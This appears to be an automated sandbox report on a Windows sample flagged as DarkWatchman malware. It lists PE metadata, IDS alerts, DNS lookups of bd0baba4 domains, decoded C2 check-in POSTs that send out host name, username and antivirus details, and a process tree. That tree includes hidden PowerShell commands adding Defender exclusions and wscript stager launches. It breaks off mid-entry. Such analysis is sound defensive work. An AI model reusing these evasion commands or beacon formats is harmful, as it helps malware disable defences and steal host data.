IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3060f	0x30800	5c34491fee255555d49145e7743274fb	False	0.5879409632731959	data	6.6930176200685825	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xa402	0xa600	46ba011f50ad8d65a6b8d983b050ac7f	False	0.4504659262048193	data	5.2029801315349085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x238b0	0x1200	ce7ee73df4e6a3a0f245a2d8fa63b9df	False	0.3682725694444444	data	3.8380200395534696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x61000	0xe8	0x200	79c1564768c1621d256d8d36e32e89fa	False	0.333984375	data	2.1181695081051135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x12e9b	0x13000	5fc1b7f4c8038d7803c78eaeffb9cbad	False	0.7324732730263158	data	7.179692902210898	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x75000	0x212c	0x2200	3e4166c697facadac24f07e8b3e0774b	False	0.7904411764705882	data	6.621792284103551	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x626a4	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x631ec	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x64798	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.28360215053763443
RT_ICON	0x64a80	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128			0.4797297297297297
RT_ICON	0x64ba8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.5844882729211087
RT_ICON	0x65a50	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.7581227436823105
RT_ICON	0x662f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.6134393063583815
RT_ICON	0x66860	0x87ea	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9974133471288154
RT_ICON	0x6f04c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.3655601659751037
RT_ICON	0x715f4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.4057223264540338
RT_ICON	0x7269c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.5647163120567376
RT_DIALOG	0x72b04	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x72d8c	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x72ec8	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x72fb4	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x730e4	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x7341c	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x73670	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x73854	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x73a20	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x73bd8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x73d20	0x446	data	English	United States	0.340036563071298
RT_STRING	0x74168	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x742d0	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x74424	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x74530	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x745ec	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x746c4	0x84	data			0.6666666666666666
RT_MANIFEST	0x74748	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T15:47:07.965728+0100	2035186	ET MALWARE Win32/DarkWatchman Activity (POST)	1	192.168.2.6	49710	185.159.131.230	443	TCP
2025-01-08T15:47:07.965728+0100	2048563	ET MALWARE Win32/DarkWatchMan Checkin Activity (POST) M2	1	192.168.2.6	49710	185.159.131.230	443	TCP
2025-01-08T15:47:09.041997+0100	2048563	ET MALWARE Win32/DarkWatchMan Checkin Activity (POST) M2	1	192.168.2.6	49711	185.159.131.230	443	TCP
2025-01-08T15:47:10.832365+0100	2034745	ET MALWARE Win32/DarkWatchman Checkin Activity (POST)	1	192.168.2.6	49713	185.159.131.230	443	TCP
2025-01-08T15:47:12.163940+0100	2034745	ET MALWARE Win32/DarkWatchman Checkin Activity (POST)	1	192.168.2.6	49714	185.159.131.230	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:47:06.966537952 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:06.966568947 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:06.966675043 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:06.973278046 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:06.973299026 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:07.789652109 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:07.789823055 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:07.808715105 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:07.808732033 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:07.809231043 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:07.865021944 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:07.965511084 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:07.965662003 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:07.965738058 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:08.063143969 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:08.063178062 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:08.063335896 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:08.067193031 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:08.067209959 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:08.988759041 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:08.988857985 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:08.992167950 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:08.992185116 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:08.992526054 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.036041975 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.041821957 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.041886091 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.041997910 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.436594009 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.437167883 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.437228918 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.462542057 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.462560892 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.462580919 CET	49710	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.462589025 CET	443	49710	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.516405106 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.520414114 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.520535946 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.540739059 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.540776968 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.540874004 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.541481018 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.541492939 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.542282104 CET	49711	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.542300940 CET	443	49711	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.597040892 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.597083092 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:09.597333908 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.597955942 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:09.597971916 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.340049982 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.340691090 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.340723038 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.341666937 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.341675043 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.341775894 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.341789961 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.396094084 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.396620035 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.396632910 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.397582054 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.397582054 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.397588968 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.397605896 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.832360983 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.832920074 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.833447933 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.833769083 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.833769083 CET	49713	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:10.833796024 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:10.833806992 CET	443	49713	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:12.163939953 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:12.164661884 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:12.164781094 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:12.164839029 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:12.164856911 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:12.164891005 CET	49714	443	192.168.2.6	185.159.131.230
Jan 8, 2025 15:47:12.164896011 CET	443	49714	185.159.131.230	192.168.2.6
Jan 8, 2025 15:47:48.340415001 CET	61178	53	192.168.2.6	162.159.36.2
Jan 8, 2025 15:47:48.345185041 CET	53	61178	162.159.36.2	192.168.2.6
Jan 8, 2025 15:47:48.345263004 CET	61178	53	192.168.2.6	162.159.36.2
Jan 8, 2025 15:47:48.350105047 CET	53	61178	162.159.36.2	192.168.2.6
Jan 8, 2025 15:47:48.786885977 CET	61178	53	192.168.2.6	162.159.36.2
Jan 8, 2025 15:47:48.816171885 CET	53	61178	162.159.36.2	192.168.2.6
Jan 8, 2025 15:47:48.816245079 CET	61178	53	192.168.2.6	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:47:06.919727087 CET	56282	53	192.168.2.6	1.1.1.1
Jan 8, 2025 15:47:06.928869009 CET	53	56282	1.1.1.1	192.168.2.6
Jan 8, 2025 15:47:06.935704947 CET	55593	53	192.168.2.6	1.1.1.1
Jan 8, 2025 15:47:06.945171118 CET	53	55593	1.1.1.1	192.168.2.6
Jan 8, 2025 15:47:06.948185921 CET	61750	53	192.168.2.6	1.1.1.1
Jan 8, 2025 15:47:06.962594032 CET	53	61750	1.1.1.1	192.168.2.6
Jan 8, 2025 15:47:48.339883089 CET	53	52562	162.159.36.2	192.168.2.6
Jan 8, 2025 15:47:48.827102900 CET	53	57607	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 15:47:06.919727087 CET	192.168.2.6	1.1.1.1	0xa2b5	Standard query (0)	bd0baba4.online	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:47:06.935704947 CET	192.168.2.6	1.1.1.1	0xc70c	Standard query (0)	bd0baba4.store	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:47:06.948185921 CET	192.168.2.6	1.1.1.1	0x4f50	Standard query (0)	bd0baba4.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 15:47:06.928869009 CET	1.1.1.1	192.168.2.6	0xa2b5	Name error (3)	bd0baba4.online	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:47:06.945171118 CET	1.1.1.1	192.168.2.6	0xc70c	Name error (3)	bd0baba4.store	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:47:06.962594032 CET	1.1.1.1	192.168.2.6	0x4f50	No error (0)	bd0baba4.site		185.159.131.230	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bd0baba4.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	185.159.131.230	443	5196	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:47:07 UTC	315	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like Gecko X-Client-Id: 9e146be9 X-Client-Controller: 0 X-Client-Ut: 864178 Content-Length: 8 Host: bd0baba4.site
2025-01-08 14:47:07 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2025-01-08 14:47:07 UTC	7	OUT	Data Raw: 65 31 34 36 62 65 39 Data Ascii: e146be9
2025-01-08 14:47:09 UTC	387	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 14:47:09 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Content-Transfer-Encoding: binary Last-Modified: Sun, 01 Jan 2000 00:00:00 GMT Expires: Sun, 01 Jan 2000 00:00:00 GMT Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0 Pragma: no-cache
2025-01-08 14:47:09 UTC	13	IN	Data Raw: 38 0d 0a 39 65 31 34 36 62 65 39 0d 0a Data Ascii: 89e146be9
2025-01-08 14:47:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	185.159.131.230	443	4836	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:47:09 UTC	315	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like Gecko X-Client-Id: 9e146be9 X-Client-Controller: 0 X-Client-Ut: 864178 Content-Length: 8 Host: bd0baba4.site
2025-01-08 14:47:09 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2025-01-08 14:47:09 UTC	7	OUT	Data Raw: 65 31 34 36 62 65 39 Data Ascii: e146be9
2025-01-08 14:47:09 UTC	387	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 14:47:09 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Content-Transfer-Encoding: binary Last-Modified: Sun, 01 Jan 2000 00:00:00 GMT Expires: Sun, 01 Jan 2000 00:00:00 GMT Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0 Pragma: no-cache
2025-01-08 14:47:09 UTC	13	IN	Data Raw: 38 0d 0a 39 65 31 34 36 62 65 39 0d 0a Data Ascii: 89e146be9
2025-01-08 14:47:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49713	185.159.131.230	443	5196	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:47:10 UTC	317	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like Gecko X-Client-Id: 9e146be9 X-Client-Controller: 2 X-Client-Ut: 864178 Content-Length: 159 Host: bd0baba4.site
2025-01-08 14:47:10 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2025-01-08 14:47:10 UTC	158	OUT	Data Raw: 73 3d 35 37 36 39 36 65 36 34 36 66 37 37 37 33 32 30 33 31 33 30 32 30 34 35 36 65 37 34 36 35 37 32 37 30 37 32 36 39 37 33 36 35 32 30 34 31 34 64 34 34 33 36 33 34 26 63 6e 3d 33 31 33 32 33 33 33 37 33 31 33 36 26 75 6e 3d 36 35 36 65 36 37 36 39 36 65 36 35 36 35 37 32 26 62 3d 31 32 30 26 6c 3d 65 6e 2d 43 48 26 61 64 6d 3d 31 26 70 64 3d 30 26 64 72 3d 30 26 61 76 3d 35 37 36 39 36 65 36 34 36 66 37 37 37 33 32 30 34 34 36 35 36 36 36 35 36 65 36 34 36 35 37 32 Data Ascii: s=57696e646f777320313020456e746572707269736520414d443634&cn=313233373136&un=656e67696e656572&b=120&l=en-CH&adm=1&pd=0&dr=0&av=57696e646f777320446566656e646572
2025-01-08 14:47:10 UTC	387	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 14:47:10 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Content-Transfer-Encoding: binary Last-Modified: Sun, 01 Jan 2000 00:00:00 GMT Expires: Sun, 01 Jan 2000 00:00:00 GMT Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0 Pragma: no-cache
2025-01-08 14:47:10 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2025-01-08 14:47:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49714	185.159.131.230	443	4836	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:47:10 UTC	317	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: / User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like Gecko X-Client-Id: 9e146be9 X-Client-Controller: 2 X-Client-Ut: 864178 Content-Length: 159 Host: bd0baba4.site
2025-01-08 14:47:10 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2025-01-08 14:47:10 UTC	158	OUT	Data Raw: 73 3d 35 37 36 39 36 65 36 34 36 66 37 37 37 33 32 30 33 31 33 30 32 30 34 35 36 65 37 34 36 35 37 32 37 30 37 32 36 39 37 33 36 35 32 30 34 31 34 64 34 34 33 36 33 34 26 63 6e 3d 33 31 33 32 33 33 33 37 33 31 33 36 26 75 6e 3d 36 35 36 65 36 37 36 39 36 65 36 35 36 35 37 32 26 62 3d 31 32 30 26 6c 3d 65 6e 2d 43 48 26 61 64 6d 3d 31 26 70 64 3d 30 26 64 72 3d 30 26 61 76 3d 35 37 36 39 36 65 36 34 36 66 37 37 37 33 32 30 34 34 36 35 36 36 36 35 36 65 36 34 36 35 37 32 Data Ascii: s=57696e646f777320313020456e746572707269736520414d443634&cn=313233373136&un=656e67696e656572&b=120&l=en-CH&adm=1&pd=0&dr=0&av=57696e646f777320446566656e646572
2025-01-08 14:47:12 UTC	387	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 14:47:12 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Content-Transfer-Encoding: binary Last-Modified: Sun, 01 Jan 2000 00:00:00 GMT Expires: Sun, 01 Jan 2000 00:00:00 GMT Cache-control: must-revalidate, no-store, no-cache, max-age=0, post-check=0, pre-check=0 Pragma: no-cache
2025-01-08 14:47:12 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2025-01-08 14:47:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:46:59
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\YyVnwn8Zst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YyVnwn8Zst.exe"
Imagebase:	0xbc0000
File size:	372'700 bytes
MD5 hash:	6CBE4DDE104084454980AE3405A0339C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:47:00
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:47:00
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:47:00
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
Imagebase:	0x700000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:47:00
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:47:00
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"
Imagebase:	0x7d0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:47:02
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"
Imagebase:	0x700000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:47:02
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:47:03
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188
Imagebase:	0x7d0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:47:05
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
